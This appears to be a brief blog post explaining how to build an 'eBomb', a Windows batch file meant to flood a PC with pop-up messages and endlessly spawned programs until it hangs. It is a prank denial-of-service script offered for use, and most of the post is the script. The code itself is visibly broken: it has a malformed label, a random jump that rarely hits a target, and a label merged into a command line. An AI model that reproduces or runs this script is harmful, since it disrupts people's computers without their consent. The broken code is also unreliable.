How To Create an eBomb?
1. Click on Start-> Run -> NotePad.
2. Copy the following code.
@echo off
msg * (YOUR MSG HERE)
cls
msg * (YOUR MSG HERE)
cls
msg * (YOUR MSG HERE)
cls
begin
goto %random%
:1
start cmd.exe
goto begin
:2
start paint.exe
goto begin
:3
start pinball.exe
goto begin :4
start iexplore.exe
goto begin
:5
start explorer.exe
goto begin
:6
start iexplore.exe"www.13downloads.com"
goto begin 3. Now save the notepad as filename.bat
4. Now dare to open the filename.bat
Note:
This filename.bat makes yourpc slow because the above program code is to open multiple process at same time so that it makes your computer hang.
Comments
Post a Comment